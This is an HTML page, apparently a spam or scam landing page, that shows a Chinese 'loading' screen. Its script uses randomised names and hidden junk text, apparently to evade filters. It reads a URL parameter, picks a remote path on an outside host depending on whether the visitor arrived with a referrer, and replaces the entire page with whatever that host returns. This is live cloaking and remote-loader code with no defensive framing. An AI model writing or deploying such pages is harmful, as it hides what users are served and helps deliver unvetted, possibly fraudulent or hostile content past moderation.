<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PomuTh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PomuTh .QEAWCiO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PomuTh .content {
            line-height: 50px;
            text-align: center
        }

        .PomuTh .img {
            width: 100%
        }

        .PomuTh .JbUwin {
            text-align: center
        }

        .PomuTh .JbUwin span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PomuTh .JbUwin span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PomuTh .JbUwin span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PomuTh .JbUwin span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PomuTh .JbUwin span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PomuTh .JbUwin span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PomuTh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yYbChqRd4DSoF(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zrJFS = yYbChqRd4DSoF('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zrJFS +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zrJFS +".html?a=share";
		}
		
        uMOqZDP3AD=url+"#"+new Date().getTime();
        uMOqZDP3AD && function() {
            $.get(uMOqZDP3AD, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >TcC1VryUulGY0ZfVSseva8Vu5psDcqwYp5ZjytsZflUBfxlCnFsHcwaELD</h1>
<b style='display:none' >o5oCVYkSVTSXFU1fwEBawraqgTznEMj5ZqzLjaxScXdWcpAyrIHtqG5rwcklhDbMj1Nkbg3RsnuxlJUgFEVsJDaXv9gM</b>
<ul style='display:none' >KEVd0FoCmwF6Ii11TWwwvdUqy</ul>
<img  src='' style='display:none'><div class="PomuTh">
    <div class="QEAWCiO">
        <div class="JbUwin">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >tozmK8mNFbAJl5v56roMlGONRS4Iw6oQQCNdXhP3JkjMc8yShiDBMNN51ngP5fJGWAbuVlDN6FfkLA5IdzSw9U4dOsG7</b>
<p  style='display:none'>aWJBeriszhu3X6abrX6rYj2LDrkc5cBjpUhy0vgwYhtWMz33TWOiZB5ODjcS4EaqF</p>
<li style='display:none' >yjpCgJejx6NnnzWJ3A6El0FqaYqfWhTTHmSIGr0XouiLbcDkR1eee0jjQl72jRXSTJGFXCkRjzDdcK0S187S2dQ1bk1UOD1SLW67L</li></body>
</html>